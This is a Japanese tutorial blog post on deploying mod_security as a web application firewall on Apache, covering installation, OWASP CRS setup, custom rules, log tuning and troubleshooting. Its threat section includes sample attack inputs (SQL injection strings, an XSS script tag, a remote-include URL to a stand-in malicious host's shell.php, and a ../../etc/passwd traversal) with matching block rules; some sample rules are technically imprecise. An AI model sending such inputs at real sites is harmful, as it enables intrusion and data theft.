MENU
  1. ホーム
  2. Apache
  3. Apacheでmod_securityを使ったWAFの導入と設定方法を徹底解説

Apacheでmod_securityを使ったWAFの導入と設定方法を徹底解説

Apache

Webアプリケーションが日々進化する一方で、サイバー攻撃の脅威も増加しています。特にSQLインジェクションやクロスサイトスクリプティング(XSS)などの攻撃は、脆弱なWebサイトを標的にしやすく、多くの企業が対策に苦慮しています。

そんな中、Webサーバーとして広く使われているApacheには「mod_security」という強力なモジュールが存在します。これは、Webアプリケーションファイアウォール(WAF)として機能し、サーバーレベルでアプリケーションを保護する役割を担います。mod_securityを導入することで、アプリケーションに手を加えずにさまざまな脅威を軽減することが可能です。

本記事では、mod_securityの基本からインストール、設定、実際に防げる脅威の例までを詳しく解説し、初心者でも簡単にApache上にWAFを構築できる方法を紹介します。Webアプリケーションのセキュリティ強化を検討している方は、ぜひ参考にしてください。

目次

mod_securityとは?


mod_securityは、Apache HTTP Serverに組み込むことができるオープンソースのWebアプリケーションファイアウォール(WAF)モジュールです。主にWebアプリケーションへの不正アクセスや攻撃をリアルタイムで検知・防御し、SQLインジェクション、クロスサイトスクリプティング(XSS)、ファイルインクルード攻撃など、多様な脅威からアプリケーションを保護します。

mod_securityの役割


mod_securityは、Webサーバーへのリクエストやレスポンスを解析し、事前に定義されたルールセットに基づいて悪意のあるリクエストをブロックします。これにより、アプリケーションのコードを変更することなくセキュリティ対策を強化することが可能です。

基本的な動作原理


mod_securityは以下のような仕組みで動作します。

  1. リクエストの監視:すべてのHTTPリクエストを解析し、攻撃の兆候を検知します。
  2. ルールセットによる判定:OWASP Core Rule Set(CRS)などのルールセットを用いて、悪意あるリクエストを特定します。
  3. 攻撃のブロック:攻撃が検知された場合は、該当のリクエストを即座にブロックし、ログに記録します。
  4. レスポンスの監視:レスポンスにもフィルタリングを行い、不正なデータが外部に漏れ出すことを防ぎます。

mod_securityを導入することで、Webサーバーレベルで強固なセキュリティ層を追加でき、潜在的な脆弱性からアプリケーションを保護できるようになります。

mod_securityのメリットと活用例

mod_securityを導入することで、Webアプリケーションのセキュリティが大幅に向上します。ここでは、mod_securityの主なメリットと、具体的な活用例について解説します。

mod_securityのメリット

  1. アプリケーションコードを変更せずにセキュリティ強化
    mod_securityはWebサーバーのレイヤーで動作するため、アプリケーションコードに手を加えることなく導入できます。これにより、既存のシステムを停止させることなくセキュリティを強化できます。
  2. 多層防御の実現
    WAFとしての役割を果たすmod_securityは、ネットワークファイアウォールやアプリケーションレイヤーの防御と組み合わせることで、多層防御を実現できます。攻撃者は1つの防御層を突破しても、mod_securityがさらなる障壁となります。
  3. 豊富なルールセットとカスタマイズ性
    OWASP Core Rule Set(CRS)などの強力なルールセットが用意されており、デフォルトで多くの脅威に対応可能です。さらに、自社のアプリケーションに特化したルールを追加し、カスタマイズすることもできます。
  4. リアルタイムでの攻撃検知と防御
    mod_securityはリアルタイムでリクエストとレスポンスを解析し、不正な通信を即座にブロックします。これにより、攻撃が発生しても素早く対応でき、被害を最小限に抑えることができます。

mod_securityの活用例

  1. SQLインジェクションの防止
    攻撃者がフォームやURLを通じて不正なSQLクエリを送信した場合、mod_securityはこれを検知してアクセスをブロックします。データベースが破壊されるリスクを軽減できます。
  2. クロスサイトスクリプティング(XSS)対策
    不正なスクリプトがブラウザで実行されるXSS攻撃に対して、mod_securityはHTMLレスポンス内のスクリプトを解析し、疑わしいものをブロックします。
  3. 不正なファイルアップロードの防止
    ファイルアップロードを許可しているWebサイトでは、攻撃者が悪意のあるスクリプトをアップロードする可能性があります。mod_securityはファイルタイプやサイズを監視し、不正なファイルを除外します。
  4. ブルートフォース攻撃の軽減
    ログインページに対するブルートフォース攻撃を検知し、一定回数以上の失敗があった場合はIPアドレスをブロックするルールを設定できます。

mod_securityの導入により、攻撃の種類を問わず包括的なセキュリティ対策を講じることができ、安心してWebアプリケーションを運用できます。

mod_securityのインストール手順

mod_securityのインストールは、比較的簡単に行うことができます。以下では、Apache環境にmod_securityをインストールし、基本的な動作確認を行うまでの手順を解説します。

前提条件

  • Apacheがすでにインストールされていること
  • 管理者権限が利用可能であること
  • Linux環境(Ubuntu/Debian系またはCentOS/RHEL系)

mod_securityのインストール方法

1. 必要パッケージのインストール


Ubuntu/Debian系

sudo apt update
sudo apt install libapache2-mod-security2


CentOS/RHEL系

sudo yum install mod_security

2. インストールの確認


インストールが完了したら、以下のコマンドでmod_securityが正しくインストールされているか確認します。

apachectl -M | grep security


以下のように表示されれば、mod_securityが正常にロードされています。

 security2_module (shared)

mod_securityの有効化


Ubuntu/Debian系

sudo a2enmod security2
sudo systemctl restart apache2


CentOS/RHEL系

sudo systemctl restart httpd

動作確認


Apacheのエラーログを確認し、mod_securityが正常に動作しているかを確認します。

tail -f /var/log/apache2/error.log  # Ubuntu/Debian系
tail -f /var/log/httpd/error_log    # CentOS/RHEL系


ログに「ModSecurity」が含まれていることを確認できれば、インストールは成功です。

次のステップ


インストール後は、基本的な設定ファイルを調整し、セキュリティルールを適用する必要があります。次のセクションでは、mod_securityの基本設定とルールセットの導入方法について解説します。

mod_securityの基本設定

mod_securityをインストールしただけでは、WAFとして十分に機能しません。適切な初期設定を行い、基本的なセキュリティルールを適用することで、効果的に攻撃を防ぐことができます。ここでは、mod_securityの基本設定手順を解説します。

設定ファイルの場所


mod_securityの設定ファイルはインストール環境によって異なります。主に以下のディレクトリに格納されています。

  • Ubuntu/Debian系: /etc/modsecurity/modsecurity.conf
  • CentOS/RHEL系: /etc/httpd/conf.d/mod_security.conf

基本設定の編集

1. 設定ファイルを編集


以下のコマンドで設定ファイルを開きます。

sudo nano /etc/modsecurity/modsecurity.conf

2. mod_securityを有効化


次の行を探し、DetectionOnly から On に変更してmod_securityを有効化します。

SecRuleEngine On

3. ログ設定


セキュリティログの出力先を指定します。デフォルトの設定では以下のようになっています。

SecAuditLog /var/log/apache2/modsec_audit.log  # Ubuntu/Debian系
SecAuditLog /var/log/httpd/modsec_audit.log    # CentOS/RHEL系


必要に応じてログの出力形式や詳細レベルを変更します。

テスト用のセキュリティルール追加


基本的な動作を確認するために、以下のテストルールを追加します。

SecRule ARGS:testparam "@contains test" "id:1234,phase:1,deny,status:403,msg:'Test Rule Triggered'"


このルールは「test」というパラメータが含まれるリクエストをブロックします。

設定ファイルの読み込みと再起動


編集が完了したら、Apacheを再起動して設定を反映させます。

sudo systemctl restart apache2  # Ubuntu/Debian系
sudo systemctl restart httpd    # CentOS/RHEL系

動作確認


ブラウザで以下のURLにアクセスし、403エラーが表示されればmod_securityが正しく動作しています。

http://your-server.com/?testparam=test

次のステップ


基本設定が完了したら、さらに高度なセキュリティルールを適用していきます。次のセクションでは、OWASP Core Rule Set(CRS)を導入し、実践的な保護を行う方法を解説します。

セキュリティルールの導入とカスタマイズ

mod_securityの効果を最大限に引き出すためには、セキュリティルールを適用する必要があります。デフォルトでは最低限のルールしか用意されていませんが、「OWASP Core Rule Set(CRS)」を導入することで、一般的な攻撃に対する強力な防御を実現できます。ここでは、CRSの導入方法とルールのカスタマイズ手順を解説します。

OWASP Core Rule Set(CRS)とは?


OWASP CRSは、SQLインジェクションやクロスサイトスクリプティング(XSS)などの攻撃を防ぐためのルールセットです。mod_securityに適用することで、幅広い攻撃からWebアプリケーションを保護できます。

CRSのインストール

1. CRSのダウンロード


以下のコマンドでOWASP CRSをダウンロードします。

sudo apt install git  # 必要に応じてgitをインストール
cd /etc/modsecurity
sudo git clone https://github.com/coreruleset/coreruleset.git

2. ルールセットの適用


CRSをmod_securityに適用するには、以下のようにシンボリックリンクを作成します。

sudo cp coreruleset/crs-setup.conf.example /etc/modsecurity/crs-setup.conf
sudo cp coreruleset/rules/*.conf /etc/modsecurity/

次に、modsecurity.confに以下の行を追加します。

IncludeOptional /etc/modsecurity/crs-setup.conf
IncludeOptional /etc/modsecurity/*.conf

CRSの基本設定


/etc/modsecurity/crs-setup.confを開き、重要な設定を確認・変更します。

1. ルールの動作モード


デフォルトでは「DetectionOnly(検知のみ)」ですが、本番環境では「Blocking(ブロック)」に切り替えます。

SecDefaultAction "phase:1,log,auditlog,pass"
# ↓
SecDefaultAction "phase:1,log,auditlog,deny,status:403"

2. 感度レベルの設定


CRSには「PARANOIA LEVEL」が用意されており、値が大きいほど検知が厳しくなります。

Paranoia Level: 1  # デフォルト(標準的な攻撃に対応)
# 2, 3, 4と増やすことで高セキュリティモード

ルールのカスタマイズ

1. 独自ルールの追加


特定の攻撃を防ぐために独自ルールを作成できます。例えば、特定のIPアドレスをブロックするルールは以下の通りです。

SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" "id:1001,phase:1,deny,status:403,msg:'Blocked IP'"

2. 誤検知の除外


誤検知が発生した場合は、該当ルールを無効化します。

SecRuleRemoveById 920350

設定の反映と動作確認


Apacheを再起動して新しいルールを適用します。

sudo systemctl restart apache2  # Ubuntu/Debian系
sudo systemctl restart httpd    # CentOS/RHEL系

ブラウザで不正なクエリを送信し、403エラーが表示されれば、ルールが適用されています。

http://your-server.com/?id=' OR '1'='1

次のステップ


CRSの導入が完了したら、攻撃ログを分析し、環境に合わせてルールをチューニングすることで、より効果的に運用できます。次のセクションでは、ログの解析とチューニング方法について解説します。

mod_securityで防げる脅威の例

mod_securityは、さまざまなWebアプリケーション攻撃を防ぐために設計されています。ここでは、mod_securityが効果的に防御できる代表的な脅威と、それぞれの攻撃がどのようにブロックされるのかを具体例を交えて解説します。

1. SQLインジェクション


攻撃概要
SQLインジェクションは、フォーム入力やURLパラメータを通じて不正なSQLクエリを挿入し、データベースを操作する攻撃です。これにより、データの流出や改ざんが引き起こされます。

防御方法
mod_securityは、SQLインジェクション特有のパターンを検知し、リクエストをブロックします。

http://example.com/login.php?id=1' OR '1'='1


ルール例

SecRule ARGS "@rx select.*from" "id:1010,phase:2,deny,status:403,msg:'SQL Injection Detected'"


結果
403エラーが返され、攻撃者はデータベースへのアクセスを阻止されます。

2. クロスサイトスクリプティング(XSS)


攻撃概要
XSSは、悪意のあるスクリプトをWebページに埋め込み、ユーザーのブラウザで実行させる攻撃です。これにより、クッキーの盗難やセッションハイジャックが発生します。

防御方法
mod_securityは、HTMLタグやJavaScriptコードをリクエスト内で検知し、悪意のあるスクリプトが含まれる通信をブロックします。

http://example.com/profile?name=<script>alert('XSS')</script>


ルール例

SecRule ARGS "@rx <script>" "id:1020,phase:2,deny,status:403,msg:'XSS Attack Detected'"


結果
スクリプトが検出され、攻撃が阻止されます。

3. リモートファイルインクルード(RFI)


攻撃概要
RFI攻撃は、外部の悪意あるスクリプトをWebアプリケーションに読み込ませる攻撃です。これにより、サーバーが乗っ取られる可能性があります。

防御方法
mod_securityは、URL形式の入力を監視し、疑わしい外部ファイルの読み込みをブロックします。

http://example.com/load.php?file=http://malicious.com/shell.php


ルール例

SecRule ARGS "@rx http://.*" "id:1030,phase:2,deny,status:403,msg:'RFI Attack Detected'"


結果
外部ファイルの読み込みが阻止されます。

4. ディレクトリトラバーサル


攻撃概要
ディレクトリトラバーサルは、../ を利用してサーバー内の機密ファイルにアクセスする攻撃です。これにより、システムの設定ファイルなどが不正に取得されます。

防御方法
mod_securityは、パス内の ../ を検知してブロックします。

http://example.com/download?file=../../etc/passwd


ルール例

SecRule ARGS "@rx \.\./" "id:1040,phase:2,deny,status:403,msg:'Directory Traversal Attack Detected'"


結果
攻撃者は不正なファイルへのアクセスを阻止されます。

5. ブルートフォース攻撃


攻撃概要
ログインフォームに対して無数のパスワードを試行する攻撃です。これにより、アカウントが乗っ取られる可能性があります。

防御方法
mod_securityは、一定回数のログイン試行を監視し、回数が閾値を超えるとIPをブロックします。
ルール例

SecRule REQUEST_URI "/login" "id:1050,phase:2,track:ip,block,status:403,msg:'Brute Force Detected'"


結果
短時間での連続ログイン試行が検出され、IPアドレスが一時的にブロックされます。

6. HTTPプロトコル違反


攻撃概要
不正なHTTPリクエストや、大量のデータを送信する攻撃により、サーバーリソースを枯渇させる攻撃です。

防御方法
mod_securityは、HTTPリクエストの形式をチェックし、不正な形式のリクエストをブロックします。
ルール例

SecRule REQUEST_LINE "!^GET|POST|HEAD" "id:1060,phase:1,deny,status:403,msg:'Protocol Violation Detected'"

次のステップ


防御可能な脅威を理解した上で、ログの解析とルールのチューニングを行うことで、より効果的にWebアプリケーションを保護できます。次のセクションでは、mod_securityのログ解析とチューニング方法について解説します。

ログの解析とチューニング方法

mod_securityは、攻撃を検知・ブロックするだけでなく、すべてのイベントを詳細に記録します。ログを適切に解析し、誤検知を減らすことで、WAFを効率的に運用できます。このセクションでは、mod_securityのログ解析方法と、誤検知を減らすためのチューニング方法について解説します。

1. mod_securityのログファイルの場所


mod_securityのログは以下の場所に記録されます。

  • 監査ログ(詳細ログ)
  • Ubuntu/Debian系: /var/log/apache2/modsec_audit.log
  • CentOS/RHEL系: /var/log/httpd/modsec_audit.log
  • エラーログ
  • Ubuntu/Debian系: /var/log/apache2/error.log
  • CentOS/RHEL系: /var/log/httpd/error_log

2. ログの基本構成


監査ログの1つのエントリは、次のような形式で記録されます。

--d6cdcd40-A--  
[24/Dec/2024:12:00:45 +0900] Wk3eEm8AAAEAAABLK2QAAAAF 192.168.0.1 55502 192.168.0.10 80  
--d6cdcd40-B--  
GET /login.php?user=admin&password=' OR '1'='1 HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0  
--d6cdcd40-F--  
HTTP/1.1 403 Forbidden  
Content-Length: 200  
Connection: close


ポイントとなるセクション

  • Aセクション: 攻撃元IPアドレスとリクエストの詳細
  • Bセクション: 攻撃リクエスト内容
  • Fセクション: 応答内容(403エラーなど)

3. 誤検知の特定


誤検知が疑われる場合、ログファイルを解析して問題となっているルールを特定します。

grep "ModSecurity" /var/log/apache2/error.log


出力例

ModSecurity: Warning. Matched "Operator `Rx' with parameter `select.*from' against variable `ARGS:username' ...


select.*fromのようなSQLクエリが誤検知された場合、そのルールIDを確認します。

4. 誤検知の除外設定


誤検知を防ぐためには、特定のルールを無効化したり、特定のリクエストのみ除外します。

方法1: 特定のルールを無効化


/etc/modsecurity/crs-setup.confに以下を追加してルールを除外します。

SecRuleRemoveById 920350  # 例: SQLインジェクションの誤検知ルール

方法2: 特定のURLやパラメータを除外


特定のURLでのみmod_securityを無効化する場合は以下を追加します。

<Location /admin>
    SecRuleEngine Off
</Location>

方法3: パラメータ単位での除外

SecRule ARGS:username "@contains select" "phase:1,nolog,allow,ctl:ruleRemoveById=920350"

5. ルールのカスタマイズ


既存のルールにカスタマイズを加えて、環境に適した設定を行います。

SecRule ARGS "@rx cmd" "id:12345,phase:1,deny,status:403,msg:'Command Injection Detected'"

6. ログ解析ツールの導入


大量のログを効率的に解析するために、goaccesslogwatchなどのログ解析ツールを導入します。

sudo apt install goaccess
goaccess /var/log/apache2/modsec_audit.log --log-format=MULTILINE

7. Apacheの再起動


ルールの変更後は、Apacheを再起動して設定を反映させます。

sudo systemctl restart apache2
sudo systemctl restart httpd

次のステップ


ログの解析と誤検知のチューニングを繰り返し行うことで、mod_securityの精度が向上します。次のセクションでは、トラブルシューティングとmod_securityの運用で発生しやすいエラーの解決方法について解説します。

トラブルシューティングとよくあるエラー

mod_securityの導入後、Webサイトが正常に動作しない場合があります。特に、正規のリクエストが誤ってブロックされる「誤検知」や、サーバーのパフォーマンス低下などが挙げられます。ここでは、mod_securityでよく発生するエラーとその対処方法を解説します。

1. 正規のリクエストが403エラーでブロックされる


症状
特定のURLにアクセスすると403 Forbiddenエラーが発生し、リクエストがブロックされる。

原因
セキュリティルールが誤検知し、正規のリクエストを攻撃と判断している可能性があります。

解決方法

  1. ログから問題のルールIDを特定します。
grep ModSecurity /var/log/apache2/error.log
  1. ログの「id」部分に注目し、問題のルールを特定します。
  2. ルールを除外します。
SecRuleRemoveById 920350


または、特定のURLでmod_securityを無効化します。

<Location /admin>
    SecRuleEngine Off
</Location>

2. Webサイト全体が500エラーを返す


症状
mod_securityを導入後、サイト全体が500 Internal Server Errorを返す。

原因
設定ファイルの記述ミスや、ルールの構文エラーが考えられます。

解決方法

  1. Apacheのエラーログを確認します。
tail -f /var/log/apache2/error.log
  1. 設定ファイルのエラーが表示される場合、該当部分を修正します。
  2. 設定ファイルの文法チェックを行います。
apachectl configtest
  1. エラーがなければApacheを再起動します。
sudo systemctl restart apache2

3. サーバーパフォーマンスが低下する


症状
mod_securityを導入後、サイトのレスポンスが遅くなる。

原因
ルールの数が多すぎるか、リクエスト解析に時間がかかっている可能性があります。

解決方法

  1. 必要のないルールを削除またはコメントアウトします。
# SecRule ARGS "@rx .*" "id:1234,deny,status:403"
  1. ルールの検証を簡略化するため、検知モード(DetectionOnly)で運用し、必要なルールのみブロックモードに変更します。
SecRuleEngine DetectionOnly

4. 特定のファイルアップロードがブロックされる


症状
画像やPDFなどのファイルアップロード時に403エラーが発生する。

原因
mod_securityがファイルアップロードを攻撃と誤認している可能性があります。

解決方法

  1. エラーログを確認し、問題のルールIDを特定します。
grep ModSecurity /var/log/apache2/error.log
  1. アップロードのみに例外ルールを適用します。
<Location /upload>
    SecRuleRemoveById 920350
</Location>

5. POSTリクエストがブロックされる


症状
フォーム送信時に403エラーが発生する。

原因
POSTリクエストのデータがmod_securityのルールに違反している可能性があります。

解決方法

  1. POSTリクエストを解析し、特定のパラメータを除外します。
SecRule REQUEST_URI "/login" "id:1050,phase:2,allow,ctl:ruleRemoveById=920350"

6. 特定のIPアドレスがブロックされる


症状
特定のIPアドレスからのアクセスが自動的にブロックされる。

原因
ブルートフォース攻撃対策などでIPが自動的にブロックされている可能性があります。

解決方法

  1. ブロックされたIPを解除します。
iptables -D INPUT -s 192.168.1.100 -j DROP
  1. mod_securityで特定のIPを許可します。
SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" "id:1060,phase:1,allow,msg:'Allow trusted IP'"

次のステップ


トラブルシューティングの方法を習得したら、引き続きmod_securityを最適化し、Webアプリケーションを安全に保護します。次のセクションでは、記事のまとめとしてmod_securityの導入効果と運用のポイントを解説します。

まとめ

本記事では、Apacheにmod_securityを導入し、Webアプリケーションファイアウォール(WAF)として活用する方法を詳しく解説しました。mod_securityは、SQLインジェクションやクロスサイトスクリプティング(XSS)、リモートファイルインクルード(RFI)などの多様な脅威を防ぐ強力なツールです。

導入から基本設定、OWASP Core Rule Set(CRS)の適用、ログ解析、誤検知のチューニング、トラブルシューティングまでのプロセスを順を追って解説しました。特に、mod_securityのログ解析とルールのカスタマイズを行うことで、Webアプリケーションの安全性を維持しつつ、不要なブロックを防ぐことができます。

mod_securityは一度設定するだけでなく、継続的にチューニングを行い、最新の脅威に対応することが重要です。Webアプリケーションの保護レベルを引き上げ、安心して運用するための強力な味方としてmod_securityを活用しましょう。

Apache
Apache WAF Webセキュリティ mod_security

コメント

コメントする

目次